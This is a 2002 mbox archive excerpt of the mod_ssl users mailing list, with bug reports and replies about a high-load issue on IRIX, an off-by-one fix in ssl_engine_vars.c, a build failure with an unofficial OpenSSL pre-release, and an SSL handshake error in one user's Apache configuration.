> On Sat, Jun 22, 2002 at 01:49:12AM +0200, modssl-bugdb@modssl.org wrote:
> > This caused a different behavior. I mean, it took a little while
> > (~3 minutes), to the loadav get high, and after a few minutes,
> > it got worse... the loadav reached ~60... Without the
> > "no-threads no-idea -fPIC" options at the openSSL compilation,
> > the high loadav is instantaneous.
> > 
> > I can bring any information you need to debug this problem. Just
> > let me know what do you need.
> 
> What kind of random seed do you use? As far as I know, IRIX has no
> /dev/random (nor /dev/urandom), so I might be a good idea to
> install prngd and let SSLRandomSeed point to its socket (using
> egd:/path/to/socket)
> 
> This might already solve your problem.
> 
> 
> Ciao
> 
> Thomas
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Denis A.V.Jr. - denao@uol.com.br
Systems Engineer - ICQ 2524962
Universo Online

perl -e 'print "computers are like air-conditioners: they stop working
when you open windows ", pack("c*",hex
"3A",sqrt(2025),(unpack(c,"=")-20),10);'


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 29 10:07:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA28102; Sat, 29 Jun 2002 10:06:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA28062; Sat, 29 Jun 2002 10:05:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E8A6C4CE768; Sat, 29 Jun 2002 10:05:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 01707286B4; Sat, 29 Jun 2002 09:43:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id VAA09005; Fri, 28 Jun 2002 21:40:16 +0200 (MET DST)
Date: Fri, 28 Jun 2002 21:40:16 +0200 (MET DST)
Message-Id: <200206281940.VAA09005@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] SSL_CLIENT_CERT_CHAIN_* ist missing (bugfix included) (PR#725)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Steffen Ullrich
Version: 2.8.10
OS: Linux
Submission from: (NULL) (217.228.234.65)


SSL_CLIENT_CERT_CHAIN_* is missing. The problem can be tracked down
to following code in ssl_engine_vars.c:

    309     else if (ssl != NULL && strlen(var) > 18 && strcEQn(var,
"CLIENT_CERT_CHAIN_", 18)) {
    310         sk = SSL_get_peer_cert_chain(ssl);
    311         result = ssl_var_lookup_ssl_cert_chain(p, sk, var+17);

in line 311 it must be 'var+18' instead of 'var+17', then everything
works again
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 29 10:07:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA28112; Sat, 29 Jun 2002 10:06:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA28064; Sat, 29 Jun 2002 10:05:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 163474CE77E; Sat, 29 Jun 2002 10:05:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 76FCF28847; Sat, 29 Jun 2002 09:44:16 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id XAA18875; Fri, 28 Jun 2002 23:25:09 +0200 (MET DST)
Date: Fri, 28 Jun 2002 23:25:09 +0200 (MET DST)
Message-Id: <200206282125.XAA18875@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: Re: [BugDB] Performance issue (PR#723)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I tried with the prngd and exactly the same problem appeared.
=(

Regards

On Mon, 2002-06-24 at 05:52, Thomas Binder wrote:
> Hi!
> 
> On Sat, Jun 22, 2002 at 01:49:12AM +0200, modssl-bugdb@modssl.org wrote:
> > This caused a different behavior. I mean, it took a little while
> > (~3 minutes), to the loadav get high, and after a few minutes,
> > it got worse... the loadav reached ~60... Without the
> > "no-threads no-idea -fPIC" options at the openSSL compilation,
> > the high loadav is instantaneous.
> > 
> > I can bring any information you need to debug this problem. Just
> > let me know what do you need.
> 
> What kind of random seed do you use? As far as I know, IRIX has no
> /dev/random (nor /dev/urandom), so I might be a good idea to
> install prngd and let SSLRandomSeed point to its socket (using
> egd:/path/to/socket)
> 
> This might already solve your problem.
> 
> 
> Ciao
> 
> Thomas
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Denis A.V.Jr. - denao@uol.com.br
Systems Engineer - ICQ 2524962
Universo Online

perl -e 'print "computers are like air-conditioners: they stop working
when you open windows ", pack("c*",hex
"3A",sqrt(2025),(unpack(c,"=")-20),10);'


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 29 11:53:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA08013; Sat, 29 Jun 2002 11:52:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id LAA07970; Sat, 29 Jun 2002 11:51:42 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id D8C342C63
	for ; Sat, 29 Jun 2002 11:51:40 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id CAB69241F; Sat, 29 Jun 2002 11:51:37 +0200 (METDST)
Date: Sat, 29 Jun 2002 11:51:37 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: [BugDB] Performance issue (PR#723)
Message-ID: <20020629095137.GC1445@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <200206282125.XAA18875@opensource.ee.ethz.ch>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200206282125.XAA18875@opensource.ee.ethz.ch>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Jun 28, 2002 at 11:25:09PM +0200, modssl-bugdb@modssl.org wrote:
> I tried with the prngd and exactly the same problem appeared.

I don't think, that your problem has to do with random seeding.
Even the built-in seeding should not cause significant load increases.

What other modules or add-ons do you use? I know that there is at least
one interaction between php4 and mod_ssl: child processes do not correctly
shut down, when both modules are used.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 13:01:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA18325; Mon, 1 Jul 2002 13:00:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA18223; Mon, 1 Jul 2002 12:59:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7F0C24CE6E2; Mon,  1 Jul 2002 12:59:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B68AD286BB; Mon,  1 Jul 2002 12:59:27 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id MAA17551; Mon, 1 Jul 2002 12:52:14 +0200 (MET DST)
Date: Mon, 1 Jul 2002 12:52:14 +0200 (MET DST)
Message-Id: <200207011052.MAA17551@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] PRIVATE: problem on mod_ssl-2.8.10-1.3.26 and openssl-0.9.7-pre1.tar.gz (PR#726)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Dante Picca
Version: 2.8.10
OS: Linux RedHat 7.2 Athlon
Submission from: (NULL) (195.110.148.66)


Hi,
I've found a problem compiling mod_ssl-2.8.10-1.3.26 with
openssl-0.9.7-pre1.tar.gz

I've used the following commands:
cd openssl-0.9.7
make
make test
make install
cd ../mod_ssl-2.8.10-1.3.26
./configure --with-apache=../apache_1.3.26
cd ../mod_perl-1.26
/usr/bin/perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.26/src
USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1
make
make install
cd ../apache_1.3.26
SSL_BASE=/path/to/openssl-0.9.7 ./configure --prefix=/xxx/xxx
--enable-module=ssl --activate-module=src/modules/perl/libperl.a
--enable-module=all --enable-shared=max --bindir=/zzz/zzz --sbindir=/yyy/yyy
--libexecdir=/xxx/xxx/modules
make 

During the last make I recive the message:
ssl_engine_kernel.c: In function `ssl_callback_LogTracingState':
ssl_engine_kernel.c:1901: warning: passing arg 1 of `SSL_state_string_long'
discards `const' from pointer target type
ssl_engine_kernel.c:1904: warning: passing arg 1 of `SSL_state_string_long'
discards `const' from pointer target type
ssl_engine_kernel.c:1907: warning: passing arg 1 of `SSL_state_string_long'
discards `const' from pointer target type
ssl_engine_kernel.c:1918: warning: passing arg 1 of `SSL_state_string_long'
discards `const' from pointer target type
ssl_engine_kernel.c:1921: warning: passing arg 1 of `SSL_state_string_long'
discards `const' from pointer target type
gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -I/usr/include/db1
-DMOD_SSL=208110 -DMOD_PERL -DUSE_HSREGEX -DEAPI -DUSE_EXPAT
-I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDBM -DSSL_ENGINE -I/home/apacheins/openssl-0.9.7/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_engine_rand.c && mv ssl_engine_rand.o
ssl_engine_rand.lo
gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -I/usr/include/db1
-DMOD_SSL=208110 -DMOD_PERL -DUSE_HSREGEX -DEAPI -DUSE_EXPAT
-I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDBM -DSSL_ENGINE -I/home/apacheins/openssl-0.9.7/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_engine_io.c && mv ssl_engine_io.o
ssl_engine_io.lo
gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -I/usr/include/db1
-DMOD_SSL=208110 -DMOD_PERL -DUSE_HSREGEX -DEAPI -DUSE_EXPAT
-I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDBM -DSSL_ENGINE -I/home/apacheins/openssl-0.9.7/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_engine_log.c && mv ssl_engine_log.o
ssl_engine_log.lo gcc -c  -I../../os/unix -I../../include   -DLINUX=22
-I/usr/include/db1 -DMOD_SSL=208110 -DMOD_PERL -DUSE_HSREGEX -DEAPI -DUSE_EXPAT
-I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDBM -DSSL_ENGINE -I/home/apacheins/openssl-0.9.7/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_engine_mutex.c && mv ssl_engine_mutex.o
ssl_engine_mutex.lo
gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -I/usr/include/db1
-DMOD_SSL=208110 -DMOD_PERL -DUSE_HSREGEX -DEAPI -DUSE_EXPAT
-I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDBM -DSSL_ENGINE -I/home/apacheins/openssl-0.9.7/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_engine_pphrase.c && mv ssl_engine_pphrase.o
ssl_engine_pphrase.lo
gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -I/usr/include/db1
-DMOD_SSL=208110 -DMOD_PERL -DUSE_HSREGEX -DEAPI -DUSE_EXPAT
-I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDBM -DSSL_ENGINE -I/home/apacheins/openssl-0.9.7/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_engine_vars.c && mv ssl_engine_vars.o
ssl_engine_vars.lo
ssl_engine_vars.c:411: `NID_x500UniqueIdentifier' undeclared here (not in a
function)
ssl_engine_vars.c:411: initializer element for
`ssl_var_lookup_ssl_cert_dn_rec[12].nid' is not constant
make[4]: *** [ssl_engine_vars.lo] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/home/apacheins/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/home/apacheins/apache_1.3.26'
make: *** [build] Error 2

If I use openssl 0.9.6d I've no problems.
I hope you'll find this information usefull
Bye


			Dante

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 13:08:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA18998; Mon, 1 Jul 2002 13:07:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id NAA18977; Mon, 1 Jul 2002 13:06:58 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id F0A8C2C63
	for ; Mon,  1 Jul 2002 13:06:56 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 6B6AC2C7F; Mon,  1 Jul 2002 13:06:54 +0200 (METDST)
Date: Mon, 1 Jul 2002 13:06:54 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: [BugDB] PRIVATE: problem on mod_ssl-2.8.10-1.3.26 and openssl-0.9.7-pre1.tar.gz (PR#726)
Message-ID: <20020701110654.GA13415@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <200207011052.MAA17551@opensource.ee.ethz.ch>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200207011052.MAA17551@opensource.ee.ethz.ch>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Jul 01, 2002 at 12:52:14PM +0200, modssl-bugdb@modssl.org wrote:
> Full_Name: Dante Picca
> Version: 2.8.10
> OS: Linux RedHat 7.2 Athlon
> Submission from: (NULL) (195.110.148.66)
> 
> 
> I've found a problem compiling mod_ssl-2.8.10-1.3.26 with
> openssl-0.9.7-pre1.tar.gz
...
> ssl_engine_vars.c:411: `NID_x500UniqueIdentifier' undeclared here (not in a
> function)

Do not use 0.9.7-pre1 (whowever released this version, it was not
released from the OpenSSL team). If you use 0.9.7-betax, the version
is correctly recognized and the problem does not appear.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 15:33:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA03325; Mon, 1 Jul 2002 15:32:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cs.bu.edu id PAA03190; Mon, 1 Jul 2002 15:30:48 +0200 (MET DST)
Received: from csa.bu.edu (savarese@csa [128.197.12.3])
	by cs.bu.edu (8.12.2/8.12.2) with ESMTP id g61DUiF2026410
	for ; Mon, 1 Jul 2002 09:30:44 -0400 (EDT)
Received: from localhost (savarese@localhost)
	by csa.bu.edu (8.10.1/8.10.1) with ESMTP id g61DUfU17034
	for ; Mon, 1 Jul 2002 09:30:41 -0400 (EDT)
X-Authentication-Warning: csa.bu.edu: savarese owned process doing -bs
Date: Mon, 1 Jul 2002 09:30:41 -0400 (EDT)
From: Scott Savarese 
To: modssl-users@modssl.org
Subject: Error viewing webpages with ssl
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Scott Savarese 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just installed modssl and apache 2.0.39 (I used the modssl module that
came with it) and got it to compile and start. But when I go to view one
of my virtual hosts I get an error with mozilla (I get a similar one with
netscape):

hostname has received an incorrect or unexpected message. Error
Code: -12227

where hostname is the name of the server I was connecting to. This happens
on all my virtual hosts that I use ssl for. The certificate I created was
self signed by me (figured it might be important). At the bottom is an
excerpt from my httpd.conf and also an excerpt from my error_log file...I
hope they help...

Thanks,
Scott Savarese


Listen 443
SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:logs/ssl_mutex
SSLRandomSeed startup file:/dev/urandom 512
SSLRandomSeed connect file:/dev/urandom 512
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/apache2/conf/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/apache2/conf/ssl.crt/server.key
SSLVerifyClient require
SSLVerifyDepth  1

    SSLOptions +StdEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
NameVirtualHost *:443

        ServerName virthost1:443 # The server names have been changed....
        DocumentRoot /home/savarese/webpages
        Alias /music "/home/savarese/mp3/"
        SSLEngine on


        ServerName virthost2:443
        DocumentRoot /home/savarese/webpages/photoalbums
        SSLEngine on


        ServerName virthost3:443
        DocumentRoot /home/savarese/webpages/resume
        SSLEngine on


And if you'd like to read on, here are the errorlogs that are generated
(the webserver was started at 7:34AM):

[Mon Jul 01 07:34:20 2002] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for
verification!?  [Hint: SSLCACertificate*]
[Mon Jul 01 07:34:20 2002] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?)
[Mon Jul 01 07:34:20 2002] [warn] RSA server certificate CommonName
(CN) `Scott Savarese' does NOT match server name!?
[Mon Jul 01 07:34:20 2002] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for
verification!?  [Hint: SSLCACertificate*]
[Mon Jul 01 07:34:20 2002] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?)
[Mon Jul 01 07:34:20 2002] [warn] RSA server certificate CommonName
(CN) `Scott Savarese' does NOT match server name!?
[Mon Jul 01 07:34:20 2002] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for
verification!?  [Hint: SSLCACertificate*]
[Mon Jul 01 07:34:20 2002] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?)
[Mon Jul 01 07:34:20 2002] [warn] RSA server certificate CommonName
(CN) `Scott Savarese' does NOT match server name!?
[Mon Jul 01 07:34:20 2002] [notice] Digest: generating secret for digest
authentication ...
[Mon Jul 01 07:34:20 2002] [notice] Digest: done
[Mon Jul 01 07:34:23 2002] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for
verification!?  [Hint: SSLCACertificate*]
[Mon Jul 01 07:34:23 2002] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?)
[Mon Jul 01 07:34:23 2002] [warn] RSA server certificate CommonName
(CN) `Scott Savarese' does NOT match server name!?
[Mon Jul 01 07:34:23 2002] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for
verification!?  [Hint: SSLCACertificate*]
[Mon Jul 01 07:34:23 2002] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?)
[Mon Jul 01 07:34:23 2002] [warn] RSA server certificate CommonName
(CN) `Scott Savarese' does NOT match server name!?
[Mon Jul 01 07:34:23 2002] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for
verification!?  [Hint: SSLCACertificate*]
[Mon Jul 01 07:34:23 2002] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?)
[Mon Jul 01 07:34:23 2002] [warn] RSA server certificate CommonName
(CN) `Scott Savarese' does NOT match server name!?
[Mon Jul 01 07:34:24 2002] [notice] Apache/2.0.39 (Unix) DAV/2
mod_ssl/2.0.39 OpenSSL/0.9.6c PHP/4.2.1 configured -- resuming normal
operations
[Mon Jul 01 09:11:45 2002] [error] SSL handshake failed (server
skibum.dyndns.org:443, client 12.22.156.217)
[Mon Jul 01 09:11:45 2002] [error] SSL Library Error: 336105671
error:140890C7:lib(20):func(137):reason(199)
[Mon Jul 01 09:11:51 2002] [error] SSL handshake failed (server
skibum.dyndns.org:443, client 12.22.156.217)
[Mon Jul 01 09:11:51 2002] [error] SSL Library Error: 336105671
error:140890C7:lib(20):func(137):reason(199)
[Mon Jul 01 09:12:45 2002] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jul 01 09:12:49 2002] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jul 01 09:19:16 2002] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!]






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 18:44:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA23327; Mon, 1 Jul 2002 18:43:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ginsberg.uol.com.br id SAA23247; Mon, 1 Jul 2002 18:42:32 +0200 (MET DST)
Received: from denao ([192.168.209.103])
	by ginsberg.uol.com.br (8.9.1/8.9.1) with ESMTP id NAA14067
	for ; Mon, 1 Jul 2002 13:41:07 -0300 (BRT)
Subject: Re: [BugDB] Performance issue (PR#723)
From: "Denis A.V.Jr." 
To: modssl-users@modssl.org
In-Reply-To: <20020629095137.GC1445@serv01.aet.tu-cottbus.de>
References: <200206282125.XAA18875@opensource.ee.ethz.ch> 
	<20020629095137.GC1445@serv01.aet.tu-cottbus.de>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Evolution/0.15 (Preview Release)
Date: 01 Jul 2002 13:38:52 -0300
Message-Id: <1025541534.455.17.camel@theblues>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Denis A.V.Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Lutz...

I compile apache using...: (from mod_ssl dir)

export CFLAGS='-DHARD_SERVER_LIMIT=8192'; ./configure
--disable-rule=DEV_RANDOM --disable-rule=EXPAT --disable-rule=IRIXN32
--disable-rule=IRIXNIS --disable-rule=SHARED_CHAIN
--disable-rule=WANTHSREGEX --enable-module=most
--enable-module=mmap_static --enable-shared=max
--with-apache=../apache_1.3.26 --with-ssl=../openssl-0.9.6d
--prefix=/opt/apache-1.3.26

cd ../apache_1.3.26
make


and I have...:

denao@isherwood /opt/apache-1.3.26# bin/httpd -l
Compiled-in modules:
  http_core.c
  mod_so.c
suexec: disabled; invalid wrapper /opt/apache-1.3.26/bin/suexec

and at the conf, I call...:

LoadModule mmap_static_module libexec/mod_mmap_static.so

        LoadModule config_log_module  libexec/mod_log_config.so

#LoadModule mime_magic_module  libexec/mod_mime_magic.so
LoadModule mime_module        libexec/mod_mime.so

        LoadModule status_module      libexec/mod_status.so
        LoadModule info_module        libexec/mod_info.so

LoadModule imap_module        libexec/mod_imap.so
LoadModule access_module      libexec/mod_access.so
LoadModule expires_module     libexec/mod_expires.so
LoadModule setenvif_module    libexec/mod_setenvif.so
LoadModule negotiation_module libexec/mod_negotiation.so
#LoadModule vhost_alias_module libexec/mod_vhost_alias.so
LoadModule ssl_module         libexec/libssl.so

The real strange thing here, is that those high loads never happens
using apache1.3.22 and mod_ssl 2.8.5... but any combination newer than
this, brings me a high load.

Best regards, and thank you so much for helping me out on this.

Denis.

On Sat, 2002-06-29 at 06:51, Lutz Jaenicke wrote:
> On Fri, Jun 28, 2002 at 11:25:09PM +0200, modssl-bugdb@modssl.org wrote:
> > I tried with the prngd and exactly the same problem appeared.
> 
> I don't think, that your problem has to do with random seeding.
> Even the built-in seeding should not cause significant load increases.
> 
> What other modules or add-ons do you use? I know that there is at least
> one interaction between php4 and mod_ssl: child processes do not correctly
> shut down, when both modules are used.
> 
> Best regards,
> 	Lutz
> -- 
> Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
> http://www.aet.TU-Cottbus.DE/personen/jaenicke/
> BTU Cottbus, Allgemeine Elektrotechnik
> Universitaetsplatz 3-4, D-03044 Cottbus
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Denis A.V.Jr. - denao@uol.com.br
Systems Engineer - ICQ 2524962
Universo Online

perl -e 'print "computers are like air-conditioners: they stop working
when you open windows ", pack("c*",hex
"3A",sqrt(2025),(unpack(c,"=")-20),10);'


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 21:18:40 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA09700; Mon, 1 Jul 2002 21:17:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id VAA09551; Mon, 1 Jul 2002 21:16:59 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id 28FD2C6995
	for ; Mon,  1 Jul 2002 15:16:47 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g61JGkra027686
	for ; Mon, 1 Jul 2002 15:16:46 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id PAA09233; Mon, 1 Jul 2002 15:16:46 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Quickie on Certrificate Requests (combined with virtual hosts)...
From: Sean M Alderman 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.7 
Date: 01 Jul 2002 15:16:46 -0400
Message-Id: <1025551006.16029.331.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Greetings all,
  I'm hoping someone on the list might have some experience with
multiple IP based virtual hosts and generating CSRs for ssl certs for
